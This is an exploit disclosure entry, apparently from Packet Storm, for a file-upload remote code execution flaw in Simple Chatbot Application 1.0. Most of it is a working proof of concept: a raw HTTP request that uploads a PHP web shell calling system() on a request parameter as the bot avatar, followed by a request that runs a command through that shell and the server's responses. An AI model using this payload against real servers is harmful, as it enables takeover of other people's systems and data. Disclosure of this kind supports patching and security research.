Simple Chatbot Application 1.0 Shell Upload

🗓️ 18 Jan 2022 00:00:00Reported by Saud AlenaziType
packetstorm🔗 packetstormsecurity.com👁 252 Views
Simple Chatbot Application 1.0 Shell Upload Remote Code Executio
`# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE)  
# Date: 18/01/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Windows 10  
  
  
# Exploit :   
  
You can upload a php shell file as a bot_avatar or user_avatar or image  
  
# ------------------------------------------------------------------------------------------  
# POC  
# ------------------------------------------------------------------------------------------  
  
# Request sent as base user  
  
POST /classes/SystemSettings.php?f=update_settings HTTP/1.1  
Host: localhost.SA  
Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474  
Content-Length: 1121  
Connection: close  
  
-----------------------------55217074722533208072616276474  
Content-Disposition: form-data; name="name"  
  
  
-----------------------------55217074722533208072616276474  
Content-Disposition: form-data; name="short_name"  
  
  
-----------------------------55217074722533208072616276474  
Content-Disposition: form-data; name="intro"  
  
  
-----------------------------55217074722533208072616276474  
Content-Disposition: form-data; name="no_result"  
  
  
-----------------------------55217074722533208072616276474  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: image/jpeg  
  
  
-----------------------------55217074722533208072616276474  
Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php"  
Content-Type: application/octet-stream  
  
<?php  
if($_REQUEST['s']) {  
system($_REQUEST['s']);  
} else phpinfo();  
?>  
</pre>  
</body>  
</html>  
-----------------------------55217074722533208072616276474  
Content-Disposition: form-data; name="user_avatar"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------55217074722533208072616276474--  
  
  
# Response  
  
HTTP/1.1 200 OK  
Date: Tue, 18 Jan 2022 00:51:29 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12  
X-Powered-By: PHP/8.0.12  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 119  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
1  
  
# ------------------------------------------------------------------------------------------  
# Request to webshell  
# ------------------------------------------------------------------------------------------  
  
GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1  
Host: localhost.SA  
Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0  
Connection: close  
  
# ------------------------------------------------------------------------------------------  
# Webshell response  
# ------------------------------------------------------------------------------------------  
  
HTTP/1.1 200 OK  
Date: Tue, 18 Jan 2022 00:51:29 GMT  
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12  
X-Powered-By: PHP/8.0.12  
Content-Length: 16  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<pre>0xSaudi  
</pre>  
`
18 Jan 2022 00:00Current
7.4High risk
Vulners AI Score7.4